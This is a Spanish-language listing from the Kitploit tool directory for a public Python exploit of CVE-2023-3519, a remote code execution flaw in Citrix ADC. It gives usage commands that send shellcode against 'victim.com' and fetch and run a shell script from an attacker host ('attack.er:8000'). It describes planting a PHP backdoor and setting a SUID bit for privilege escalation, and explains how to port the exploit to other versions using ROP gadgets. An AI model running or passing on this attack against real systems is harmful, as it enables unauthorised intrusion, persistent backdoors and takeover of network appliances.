Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-3519 — Exploit en Python para CVE-2023-3519 dirigido a Citrix ADC con shellcode NASM personalizado, despliegue de puerta trasera PHP y escalada de privilegios SUID. | Kitploit
Herramientas/GitHubGitHub/passwa11/cve-2023-3519
Análisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubpasswa11/cve-2023-3519

CVE-2023-3519

Exploit en Python para CVE-2023-3519 dirigido a Citrix ADC con shellcode NASM personalizado, despliegue de puerta trasera PHP y escalada de privilegios SUID.

Ver Repositorio
112hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Citrix ADC RCE CVE-2023-3519

Este exploit utiliza direcciones y shellcode para Citrix VPX 13.1-48.47. Para el artículo completo, haga clic aquí.

Uso

Se requiere NASM para compilar el shellcode.

root@kitploit:~
$ sudo apt install nasm

El shellcode incluido descargará y ejecutará un script de shell desde un servidor http(s) remoto. El script acepta 3 argumentos: el host objetivo, el puerto objetivo y la URL de un payload de script de shell. En este repositorio se incluye un payload de ejemplo que ejecuta id y uname -a antes de limpiarse a sí mismo.

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

La URL debe ser lo suficientemente corta para caber en el buffer del shellcode; recibirá una advertencia si es demasiado larga.

Artefactos del shellcode

El shellcode creará una puerta trasera PHP en /var/netscaler/logon/a.php y establecerá el bit SUID en . El payload incluido muestra un ejemplo de cómo limpiar automáticamente estos artefactos. Tenga en cuenta también que el shellcode no cierra sus descriptores de archivo, por lo que la explotación repetida excesiva puede provocar el agotamiento de recursos.

/bin/sh
sh

Adaptación a otras versiones

Para objetivos Citrix basados en FreeBSD, solo necesita encontrar 3 valores: el desplazamiento del puntero de retorno guardado, un gadget ROP jmp rsp (o algo equivalente, como push rsp; ret;) y la dirección a la que saltar para evitar un bloqueo. Estos parámetros están codificados cerca de la parte superior de cve-2023-3519.py.

Descargar herramienta